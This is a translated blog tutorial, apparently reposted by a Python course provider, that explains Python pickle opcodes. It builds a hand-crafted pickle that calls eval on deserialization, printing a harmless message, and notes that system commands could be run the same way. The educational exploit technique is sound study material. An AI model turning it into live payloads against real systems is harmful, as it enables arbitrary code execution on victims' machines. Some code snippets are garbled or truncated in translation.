Dangerous pickles - malicious serialization in Python

Original author: Evan Sangaline
  • Transfer

Panta rhei, and now the launch of the updated course "Python Web Developer" is approaching and we still have material that we found very interesting and that we want to share with you.

Why are pickles dangerous?
These pickles are extremely dangerous. I don’t even know how to explain how. Just trust me. This is important, understand?
“Explosive Disorder” Pan Telare

Before diving into the opcode, let's talk about the basics. The Python standard library has a module called pickle (translated as “ pickle ” or simply “preservation”), which is used to serialize and deserialize objects. Only this is called not serialization / deserialization, but pickling / unpickling (literally - “conservation / de-preservation”).

As a person who still suffers from nightmares after using Boost Serialization in C ++, I can say that the conservation is excellent. Whatever you throw at her, she continues to Just Work. And not only with builtin types - in most cases, you can serialize your classes without having to write serializationpreservative methods. Even with objects such as recursive data structures (which would cause a crash when using a similar marshal module), there are no problems.

Here is a quick example for those who are not familiar with the pickle module:

import pickle
# начать с любого инстанса типа Python
original = { 'a': 0, 'b': [1, 2, 3] }
# преобразовать это в строку
pickled = pickle.dumps(original)
# преобразовать обратно в идентичный объект
identical = pickle.loads(pickled)

This is sufficient in most cases. The conservation is really cool ... but somewhere in the depths darkness is hidden.

One of the first lines of the pickle module says:
Attention: The pickle module is not protected from erroneous and malicious data. Never re-preserve data from an unreliable and unauthorized source.

I read this warning many times and often wondered what the malicious data might be. And recently, I decided it was time to find out. And not in vain.
My quest for creating malicious data helped me learn a lot about the operation of the pickle protocol, discover cool methods for debugging conservation and find a couple of daring comments in the Python source code. If you continue reading, you will get the same benefits (and soon you will start sending people your malicious conservation files too). Warning: there will be technical details, the only prerequisite is basic knowledge of Python. But a superficial knowledge of assembler does not hurt.

Fake Pickle Bomb

I started by reading the pickle module documentation, hoping to find tips on how to become an elite hacker, and came across a line:
The pickletools module contains tools for analyzing data flows generated by conservation. The pickletools source code contains extensive comments about the opcodes used by pickle protocols.

Opcodes? I did not expect the implementation of pickle to be like this:

def dumps(obj):
    return obj.__repr__()
def loads(pickled):
    # Внимание: Модуль pickle не защищен...
    return eval(pickled)

But I also did not expect her to define her own low-level language. Fortunately, the second part of the line is telling the truth - pickletools modules are very helpful in understanding how the protocols work. Plus, the comments in the code turned out to be very funny.

For example, we pose the question of which version of the protocol we need to focus on. There are a total of five in Python 3.6. They are numbered from 0 to 4. Protocol 0 is an obvious choice because it is called “ readable ” in the documentation, and pickletools source code offers additional information:

Pickle opcodes never disappear even when new ways to do something appear. PM’s repertoire is only growing over time ... “Oppod bloating” is not a subtle hint, but a source of debilitating difficulties.

It turns out that each new protocol is a superset of the previous one. Even if you do not take into account that protocol 0 is “readable” (it doesn’t matter because we decompile instructions), it also contains the least number of possible opcodes. Which is ideal if the goal is to understand how malicious pickle files are created.

If you are confused with the opcodes, do not worry. Now we will return to Python, and after I will explain in detail how opcodes relate to Python code. Create a simple Python class without opcodes.

class Bomb:
    def __init__(self, name):
        self.name = name
    def __getstate__(self):
        return self.name
    def __setstate__(self, state):
        self.name = state
        print(f'Bang! From, {self.name}.')
bomb = Bomb('Evan')

The __setstate __ () and __getstate __ () methods are used in the pickle module to serialize and deserialize classes. Often you do not need to define them yourself, because default implementations simply serialize the __dict__ instance. As you can see, I directly defined them here to hide a little surprise at the moment of deserializing the Bomb object.

Check if the deserialization code works with a surprise. We can preserve and re-preserve the object using:

import pickle
pickled_bomb = pickle.dumps(bomb, protocol=0)
unpickled_bomb = pickle.loads(pickled_bomb)

We get:

# Пиф-паф! От Эвана.
Bang! From, Evan.    

Exactly according to plan! There is only one problem: if we try to deserialize the pickled_bomp line in a context where Bomb is not defined, nothing will work. Instead, an error will appear:

AttributeError: Can't get attribute 'Bomb' on 

It turns out that we can run our custom method __setstate__()only if the unreserved context already has access to the code with our malicious print expression. And if we already have access to the code launched by the victim, why bother with pickle? We can simply write malicious code in any other method that the victim will use. And this is true - I just wanted to demonstrate it.

After all, it’s not in vain to suspect that Pyton might support conservation bytecode for the object deserialization method. For example, the marshal module can serialize methods, and many pickle alternatives: marshmallow , dill , and pyro also support function serialization.

However, the ominous warning in the pickle documentation does not mean that. You need to dive a little deeper to find out the dangers of deserialization.

Decompiling Pickle

It is time to try to understand how conservation really works. Let's start by looking at the object from the previous section - pickled_bomb.


Wait ... did we use protocol 0? Is it “readable”?

But it’s okay, in pickletools source code we should find “extensive comments about opcodes used by pickle protocols” . They should help us sort out the problem!
I am desperate to document this in detail - read the pickle code fully to find all the special cases.
- Comment in source code pickletools

God. What do we fit into?

Just kidding, the source code for pickle tools is really great commented. And the tools themselves are no less useful. For example, there is a method for disassembling pickle called pickletools.dis (). It will help translate our pickle into a more understandable language.

To disassemble our pickled_bomb line, simply run the following:

import pickletools

В результате получим:
0: c    GLOBAL     'copy_reg _reconstructor'
   25: p    PUT        0
   28: (    MARK
   29: c        GLOBAL     '__main__ Bomb'
   44: p        PUT        1
   47: c        GLOBAL     '__builtin__ object'
   67: p        PUT        2
   70: N        NONE
   71: t        TUPLE      (MARK at 28)
   72: p    PUT        3
   75: R    REDUCE
   76: p    PUT        4
   79: V    UNICODE    'Evan'
   85: p    PUT        5
   88: b    BUILD
   89: .    STOP
highest protocol among opcodes = 0

If you were dealing with languages ​​like x86 , Dalvik , CLR , then all of the above may seem familiar. But even if they didn’t have it - it’s not a problem, we’ll take it step by step. For now, it’s enough to know that headwords like GLOBAL, PUT, and MARK are opcodes, and instructions that are interpreted almost like functions in higher-level languages. All to the right are the arguments of these functions, and to the left it is shown how they were encrypted in the original “readable” line.

But before starting the step-by-step analysis, we will present one more useful thing from pickletools: pickletools.optimize (). This method removes unused opcodes from pickle. The output is a simplified but similar pickle. We can parse the optimized version of pickled_bomb by running the following:

pickled_bomb = pickletools.optimize(pickled_bomb)

And we get a simplified version of a series of instructions:

 0: c    GLOBAL     'copy_reg _reconstructor'
   25: (    MARK
   26: c        GLOBAL     '__main__ Bomb'
   41: c        GLOBAL     '__builtin__ object'
   61: N        NONE
   62: t        TUPLE      (MARK at 25)
   63: R    REDUCE
   64: V    UNICODE    'Evan'
   70: b    BUILD
   71: .    STOP
highest protocol among opcodes = 0

You may notice that this differs from the original only in the absence of all PUT opcodes. Which leaves us with 10 instructional steps to understand. Soon, we will examine them separately and manually “parse” the Python code.

During de-preservation, opcodes are usually interpreted by an entity called Pickle Machine (PM). Each pickle is a program running on PM, much like compiled Java code runs on the Java Virtual Machine (JVM) . To parse our pickle code, you need to understand the work of PM.

PM has two areas for storing data and interacting with them: memo and stack. Memo is designed for long-term storage, and is similar to a Python dictionary matching integers and objects. Stack is like a Python list, which many operations interact with, adding and pulling things out. We can emulate these Python data regions as follows:

# долговременная память/хранилище PM
memo = {}
# Stack PM, с которым взаимодействует большая часть опкодов
stack = []

During de-preservation, PM reads the pickle program and sequentially executes each instruction. It terminates whenever it reaches the STOP opcode; any object located at the top of the stack is the final result of re-conservation. Using our emulated memo and stack repositories, let's try translating our pickle into Python ... instruction by instruction.

  • GLOBAL pushes the class and function into the stack, passing the module and name as arguments. Note that the message is a bit misleading because in Python 3 copy_reg was renamed copyreg.

  • MARK pushes a special markobject into the stack, so that later we can use it to specify part of the stack. We will use the string “MARK” to represent markobject.

    # Пушит markobject в стэк.
    # 25: (    MARK

  • GLOBAL again. But this time with the __main__ module, so we do not need to import.

    # Пушит глобальный объект (module.attr) в стэк.
    # 26: c        GLOBAL     '__main__ Bomb'
  • GLOBAL again. And we do not need to explicitly import the object.

    # Пушит глобальный объект (module.attr) в стэк.
    # 41: c        GLOBAL     '__builtin__ object'

  • NONE just pushes None into the stack.

    # Пушит None в стэк.
    # 61: N        NONE

  • TUPLE is a little trickier. Remember how we used to add “MARK” to the stack? This operation will move everything from the stack after “MARK” to the tuple. After that, she will delete “MARK” and replace it with a tuple.

    # Создать кортеж из верхней части стэка, после markobject.
    # 62: t        TUPLE      (MARK at 28)
    last_mark_index = len(stack) - 1 - stack[::-1].index('MARK')
    mark_tuple = tuple(stack[last_mark_index + 1:])
    stack = stack[:last_mark_index] + [mark_tuple]
    Будет полезным посмотреть, как это преобразуется в стэке.
    # стэк перед операцией TUPLE:
    [, 'MARK', __main__.Bomb, object, None]
    # стэк после операции TUPLE:
    [, (__main__.Bomb, object, None)]

  • REDUCE removes the last two things from the stack. After that, it calls the penultimate object using the positional extension of the last thing, and places the result in the stack. It’s hard to explain with words, but everything is clear in the code

    # Пушит объект, полученный из callable и tuple аргумента.
    # 63: R    REDUCE
    args = stack.pop()
    callable = stack.pop()

  • UNICODE just pushes a Unicode string into the stack (a very good Unicode string, by the way!)

    # Пушит объект строк Python Unicode.
    # 64: V    UNICODE    'Evan'

  • BUILD removes the last object from the stack and then passes it as an argument to __setstate __ () with the new last thing in the stack

    # Завершает создание объекта через обновление __setstate__ или dict.
    # 70: b    BUILD
    arg = stack.pop()

  • STOP simply means that any item at the top of the stack is our final result.

    # Останавливает PM.
    # 71: .    STOP
    unpickled_bomb = stack[-1]

Fuh, we're done! Not sure if our code is especially Python ... but it emulates PM. You may notice that we have never used memo. Remember all those PUT opcodes that were removed during pickletools.optimize ()? They might have interacted with momo, but in our simple example this was not needed.

Let's try to simplify the code to visually show its work. In fact, in addition to mixing data, there are only three operations: importing _reconstructor in instruction 1, calling _reconstructor in instruction 7 and calling __setstate __ () in instruction 9. If you mentally imagine mixing data, then you can express everything with three Python lines.

# Инструкция 1, где произошел импорт `_reconstructor`
from copyreg import _reconstructor
# Инструкция 7, где `_reconstructor` был вызван
unpickled_bomb = _reconstructor(cls=Bomb, base=object, state=None)
# Инструкция 9, где `__setstate__` был вызван

A look inside the copyreg._reconstructor () source code reveals that we are simply calling object .__ new __ (Bomb). Using this knowledge, we can simplify everything to two lines.

unpickled_bomb = object.__new__(Bomb)

Congratulations, you just decompiled pickle!

A Real Pickle Bomb

I am not a pickle expert, but I already outline how to construct a malicious pickle. You can use the GLOBAL opcode to import any function - os.system and __builtin __. Eval seem to be suitable candidates. And then we use REDUCE to execute it with an arbitrary argument. But just ... wait, what is it?

If not isinstance (callable, type), REDUCE will not swear only if callable was registered in the safe_constructors dictionary of copyreg module, or callable has a magic attribute __safe_for_unpickling__ with a true value. I don’t know why this happens, but I have seen enough complaints <winks>.

Wink in response. The pickletools documentation seems to suggest that only allowed callable can be performed by REDUCE. For a moment, this made me worried, but a search for “safe_constuctors” quickly helped find PEP 307 from 2003.

In previous versions of Python, de-preservation had a “security check” on individual operations, refusing to call functions or constructors that were not marked “safe for de-preservation” for presence of the __safe_for_unpickling__ attribute equal to 1, or registration in the global register copy_reg.safe_constructors.

This feature creates a false sense of security: no one has ever carried out the necessary extensive code verification to prove that de-picking pickle from untrusted sources cannot cause unwanted code. In fact, bugs in the pickle.py module of Python 2.2 make it easy to circumvent these precautions.

We strongly believe that when using the Internet, it is better to know that your protocol is unsafe than to trust the security of a protocol whose implementation has not been thoroughly verified. Even high-quality implementation of popular protocols often contains errors; Without a lot of time, pickle implementations in Python simply cannot guarantee. Therefore, since Python 2.3, all de-preservation security checks are officially excluded and replaced with a warning:
Warning: Do not reopen data from unreliable and unverified sources.

Hello, darkness, our old friend . This is where it all began.

That's all, we found the key ingredient, and there was no false sense of security from what we plan to do. Let's start by writing our bomb:

# добавить функцию в стэк для выполнения arbitrary python
GLOBAL     '__builtin__ eval'
# отметить старт кортежа наших аргументов
    # добавить код Python, который мы хотим выполнить в стэке
    UNICODE    'print("Bang! From, Evan.")'
    # завернуть код в кортеж, чтобы его можно было распарсить через REDUCE
# вызвать `eval()` с нашим кодом Python в качестве аргумента
# использовать STOP, чтобы сделать PM код валидным

To turn this into a real pickle, you need to replace each opcode with the corresponding ASCII code: c for GLOBAL, (for MARK, V for UNICODE, t for TUPLE, R for REDUCE, and. For STOP. Note that these are the same values, which were written to the left of the opcodes in the output of pickletools.dis () earlier. The arguments are analyzed after each opcode taking into account the combination of position and newline constraint. Each argument is located either immediately after the corresponding opcode or after the previous argument, and is read continuously until until a newline character is found. th pickle Code provides as follows:

(Vprint("Bang! From, Evan.")

Finally, we can verify this:

# Запусти меня дома!
# Я безопасен, обещаю!
pickled_bomb = b'c__builtin__\neval\n(Vprint("Bang! From, Evan.")\ntR.'

III ...

# Пиф-паф! От Эвана.
Bang! From, Evan.

I know that you have no reason to believe me, but it really worked the first time.
It's easy to see that anyone can easily come up with a more malicious argument for eval (). PM can be made to do literally anything that Python code can execute, including the os.system () system commands.

All good things come to an end.

I planned to learn how to make a dangerous pickle, but accidentally in the process I realized how pickles work. I admit, I liked delving into this Pickle Machine. The pickletools source code has helped a lot , and I recommend it if you are interested in learning more about the pickle protocol and PM.


As always, we are waiting for wishes and questions that can be asked here or personally to Ilya Lebedev atOpen door day .

Also popular now: